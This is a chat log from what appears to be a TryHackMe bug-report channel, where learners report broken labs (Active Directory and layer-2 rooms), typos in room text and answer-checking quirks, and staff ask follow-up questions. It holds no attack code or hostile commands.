hey guys, this room doesn't work at all....https://tryhackme.com/r/room/layer2 - like the VMs boots but I get no info about the hosts, just the flood traffic. Tasks 1-6 have a diff vm than 7-10. I cant seem to capture any of the data its asking for and i'm following everything to the letter. Super interested in route/arp/dns poisoning so thats kinda why I'm in that room lol.

having same bug again with KDC_ERR_PADATA_TYPE_NOSUPP in the active directory persisting room. I followed instructions here to RDP to THMDC but cannot request new cert :

why are these active directory rooms so horribly bugged .... 😦 I am trying to solve all this for weeks now

i've done the room and it works fine if you wait 6-7mins after starting it and doing anything

Strange, I def waited long enough for the room to boot. I ran the pcap numerous times with the same result....I'll give it another try. Thanks 🙂

Gave +1 Rep to @median coral (current: #17 - 411)

guys is it possible that some people are just having fun destroying networks?

again I try the persisting-ad room, i can do things for like 10 minutes and then suddenly DC is not acting as DNS anymore, machines are not found

Hey there 🙂

May I ask if you were unable to finish the room back then, due to the target machine?
We have increased the resources now, but I would like to know your opinion if the now set resources you think are sufficient?

Hi, I was able to finish the room, but it took forever to do anything. I had to stand up and take a walk for each action I did. It's wonderful that the room has more resources now 🙂

PS: I love the DFIR rooms on TryHackMe. They really helped me during preparation to a collage exam this week.

Ah okay, if you already done with the room, then I'm giving it a quick try myself now 🙂

Glad to hear it helped you!

hey

https://tryhackme.com/room/btsysinternalssg
Question: Using WHOIS tools, what is the ISP/Organization for the remote address in the screenshots above?

IP Resolves to Amazon not the answer that was intented.

Typo https://tryhackme.com/room/btwindowsinternals Task 11 - Question 1
'What is the non-existent process for explorer.exe?'
Should be
'What is the non-existent parent process for explorer.exe?'

Cheers

Typo https://tryhackme.com/r/room/tmuxremux Task 2 last question
"How to kill all tmux sessions accept the one currently in use? With the name "notes"."
Should be
"How to kill all tmux sessions except the one currently in use? With the name "notes"."

Have a good one

Another Typo in https://tryhackme.com/r/room/tmuxremux Last sentence in the reading part
"For the join-pane commands adding -v on the end fuses the two panes together horizontally. Adding -h on the end of the join-pane command fuses two panes together vertically."
Should be
"For the join-pane commands adding -v on the end fuses the two panes together vertically. Adding -h on the end of the join-pane command fuses two panes together horizontally."

I don’t think a typo would be considered a bug

This is the channel to report typos.

Oh

Guess I was wrong

small issue with https://tryhackme.com/r/room/webosint - the format of the answer in Task 7 is confusing: I've spent quite some time on it, finally opened a writeup and turns out the IP owner (the common link) used to be displayed as Liquid Web L.L.C, now it's just LIQUIDWEB. When I typed Liquid Web into Google, they use the name Liquid Web (without L.L.C) basically everywhere, I've found only one occuence of Liquid Web L.L.C. Not really sure if that's a bug, but definitly looks like unintended additional difficulty

Ok now I see they are displayed as Liquid Web, L.L.C on ipinfo, so I guess I could have got that after further reasearch

I believe that there is an issue with the way that Enumerating Active Directory is set up. When entering the room and launching the web-based AttackBox, the .ovpn file for the "enumad" interface does exist, but using "ip a" or "ifconfig" does not list the "enumad" interface. When using the "systemd-resolve" command to configure the DNS to the THMDC, an error occurs stating "enumad" doesn't exist as an interface. I have tried waiting multiple days between attempts, restarting the Box and the network, resetting room progress and formally leaving the room, but none of it works. It seems that the other AD networks all work perfectly fine however.

https://tryhackme.com/r/room/windowsforensics1 Task 10 Question 2

Correct answer is 'thm-user2' however answer box accepts 'thm-user' as an acceptable answer.

Must be answer tolderance. When you refreshed the page, did it reflect the correct user?

There’s answer tolerance? I must be missing out on something

Some answers allow for errors, the longer the answer the more tolerance to errors.

I got it working by doing a ctrl+f5 to reload all pages

Just to aid in to that, this is because e.g. js files might be cached by your browser, and thus not getting pulled again.
So by using ctrl+f5 you made a full refresh that pulled that js file again.

Just if that might help to understand why that happened 🙂

I've spotted a mistake in https://tryhackme.com/r/room/threatmodelling

In task 4, 2nd question the correct answer is 14, perhaps the matrix was edited

Hey good thought. Just checked - no still showing the original text 'thm-user' rather than 'thm-user2'. Mainly just flagging for any QA passes.

It's thm-user2 on my side.

Can you please verify and screenshot?

Is this intended or not? Wireshark basics room Task 5. Can be very difficult for users to read

Not intended. That's an interesting one, it looks okay in the task editor visually. Looks to be a CSS issue.

Saw a similar issue in one of the rooms I was working earlier. I'll put it in here when I get the chance.

Not really a bug, but there is a small mistake in the "Exploiting Active Directory" room, in the introduction:

Saw the similar issue in https://tryhackme.com/r/room/olympusroom -

There's a typo in

https://tryhackme.com/r/room/vulnerabilitymanagementkj

Assess is splelt correctly.

I though it should be Assets. ok then